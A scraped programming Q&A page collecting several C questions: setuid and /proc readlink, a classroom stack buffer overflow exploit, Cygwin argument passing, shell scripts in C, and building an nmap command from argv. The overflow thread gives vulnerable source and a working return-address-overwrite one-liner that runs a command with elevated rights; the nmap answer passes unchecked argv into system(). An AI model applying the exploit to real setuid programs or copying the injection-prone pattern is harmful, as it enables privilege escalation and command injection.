Develop Reference

Problems with readlink and set uid

I'm having trouble getting setuid to work as hoped (chmod 3755).
I'm trying to implement, using C language, my own version of psgrep (or pgrep) for a very specific need. In order to accomplish this, I need to get the value of the link at /proc/[pid]/exe for every listed [pid]
To demonstrate the issue, I made this tiny program: (proof.c)
#define _GNU_SOURCE
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[]) {
char procFilename[] = "/proc/1/exe" ;
char pointsTo[80] ;
int rc ;
memset(pointsTo, 0x00, sizeof(pointsTo)) ;
rc = readlink(procFilename, pointsTo, sizeof(pointsTo)) ;
if ( rc < 0 ) {
perror("Trying to read /proc/1/exe link") ;
}
else {
printf("%s points to %s.\n", procFilename, pointsTo) ;
}
}
In the same folder, I exeucte:
gcc -o proof proof.c
sudo chown root:root proof
sudo chmod 3755 proof
Now, here are the execution results:
> ./proof
Trying to read /proc/1/exe link: Permission denied
> sudo ./proof
/proc/1/exe points to /usr/lib/systemd/systemd.
> ls -l proof
-rwxr-sr-t 1 root root 16888 Feb 16 14:06 proof
As I understand it, the chmod and chown combination should have gotten me past the permission error, but obviously I am missing something.
When I searched stackoverflow for "sticky-bit problems" there were no good matches (though a surprising number of people expect setuid to work with scripts). One problem about 2.6 kernel didn't seem to fit either. Anyway, what might I be missing?

Exploiting a Stack Buffer Overflow

I'm doing a buffer overflow assignment and I'm stuck on the syntax for this command:
$ ./script $(perl -e 'print "A" x 36 . "\x40\x83\x04\x08"' | touch test.txt)
We're expected to use this one liner instead of a shell. The return address is correct and it takes me to the correct place in the assembly, but when I run this, the functions execute as the standard user, instead of running as root.
From what I gather, the issue is either syntax or quotation marks.
How could I correct the one liner?
Source for Script
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
char arg1[60];
char arg2[60];
void func(char *s){
char buf[32];
strcpy(buf, s);
printf("you entered: %s\n", buf);
}
void secret(){
system(arg2);
}
int main(int argc, char *argv[]){
if(argc < 2){
printf("Usage: %s some_string\n", argv[0]);
return 2;
}
strcpy(arg1, argv[1]);
if (argc == 3) {
strcpy(arg2, argv[2]);
}
func(argv[1]);
return 0;
}

I think you the part that says | touch test.txt) is not needed.
./script $(perl -e 'print "A" x 36 . "\x40\x83\x04\x08"') "touch test.txt"
should work.
I am not sure why you are piping the output of the shell script to the touch command (I am assuming the buffer overflow you want to exploit is in the script, and it ends up somehow using the second argument as a parameter to a function).
As in terms of why it's being executed as normal user, in your scenario, your shell was running touch as a normal user. What I think you want to do is run your script as root (either by making it a setuid binary or just running the program with sudo, and make the script actually perform the call to system("touch ...");.

After some tinkering, and a bunch of help from the community, the resolution was to use:
./step4 `perl -e 'print "A" x 36 . "\x94\x84\x04\x08"'` "touch test.txt"
I checked the assembly in gdb, called the correct address for the secret function and by swapping the $() for back ticks, the attack executed as expected. Big thanks to Marco for the help on this one.

Running a c program from command prompt with Windows 10 and Cygwin

I'm trying to run a simple program from command prompt for educational prupose to demonstrate the parameter exchange between a c program and operating system. I got the following output.
I implemented the following code. Please ignore some of the printf outputs. They're written in German. I know I run the program with less parameter. The output should be a hint on program was run with less parameter instead.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[]) {
if(argc < 4)
printf("Das Programm wurde mit %d anstatt den notwendigen 4 Parametern "
"gestartet.", argc);
else {
int modus = atoi(argv[1]);
double niveau = atof(argv[2]);
char datei[13];
size_t strlcpy = strlcpy(datei, argv[3], (int)sizeof(datei) - 1);
printf("\n\nMAIN-Parameter");
printf("\n#Parameter:\t%d", argc);
printf("\nProgrammname:\t%s", argv[0]);
printf("\nModus:\t%d", modus);
printf("\nNiveau:\t%f", niveau);
printf("\nDatei:\t%s", datei);
}
return 0;
}
Appreciate your input.
Cheers

Install gcc and some other compiler tools into your cygwin:
C:\cygwin64>setup-x86_64.exe -q -P wget -P gcc-g++ -P make -P diffutils -P libmpfr-devel -P libgmp-devel -P libmpc-devel
Open a cygwin terminal. Compile your source:
$ gcc main.c -o main
Run your binary with the arguments:
$ ./main 1 2 date

How can I put bash script in C program

I have shell scripts and I need to run that continuous work in background.
For example:
#include <stdio.h>
int main(int argc, char **argv)
{
for (; ;) {
system("./dup -r /root/duptest/");
sleep(60);
}
return 0;
}
It's working and run every minute.
First question: How can I run this background(like & --> ./dup ... &) without put &.
Second question: How can I put shell codes in C source codes?
I found this, Do I need to put \n\ for all lines? It's so hard for edit.
#include <stdio.h>
#include <stdlib.h>
#define SHELLSCRIPT "\
#/bin/bash \n\
echo \"hello\" \n\
echo \"how are you\" \n\
echo \"today\" \n\
"
int main()
{
system(SHELLSCRIPT);
return 0;
}
Third question: How can I use shell parameter in C, like this:
./dup.exe -r /blablabla...
mean
system("./dup -r /blablabla");
I need to use $1 $2 parameter with compiled C program.

Question 1: Look for "how to make a process as deamon process in UNIX" Although daemon process is a overkill for your requirement, you can perform steps until the process is running according to your requirements
Question 3: You need to have command line arguments, check about that. Your main should look like main(int arg_count, char *args_vector[]){...} and in that you can access each command line argument as an array element

Q1: use fork() and don't wait on the child's PID.
Q2: C and C++ will concatenate adjacent string literals, like so:
static const char script[] =
"echo hello\n"
"echo how are you\n"
"echo today"
;
int main(int argc, char* argv[])
{
puts(script); // so you can see what it looks like
// system(script); // <-- uncomment this line to actually run it.
return 0;
}
Q3: use the argc and argv parameters to main() to build the command line you want to execute.

Need help on simple C command line argument

I don't really know how to explain this but here's my problem:
I am trying to make my program accept command line arguments and then run a program via. the Linux command line (CentOS 6).
Heres the main function:
int main(int argc, char *argv[])
I am trying to run a Linux program, here's the code:
system("nmap -sT -p 19 1.1.1.* -oG - | grep 19/open > temp");
I want to replace '1.1.1.*' with the first argument I input into my C program, Ex:
system("nmap -sT -p 19 ", (argv[1]) "-oG - | grep 19/open > temp");
I have tried multiple ways and none seemed to work.
To sum it up, i'm trying to take the first argument I input into my program and use it in replace of the '1.1.1.*' in the system function. I have no idea on how to do this, I'm new to C programming. Thank you all replies are appreciated.

snprintf is the safest way to do this, this is a simple example without any checking of argc etc...:
#include <string.h>
#include <stdio.h>
int main(int argc, char *argv[])
{
char buf[200] ;
char str1[] = "nmap -sT -p 19 ";
char str2[] = " -oG - | grep 19/open > temp";
snprintf(buf, 200, "%s%s%s", str1, argv[1], str2);
printf( "%s\n", buf ) ;;
}

Just use the following syntax to accept command line arguments in Linux.
./program arg1 arg2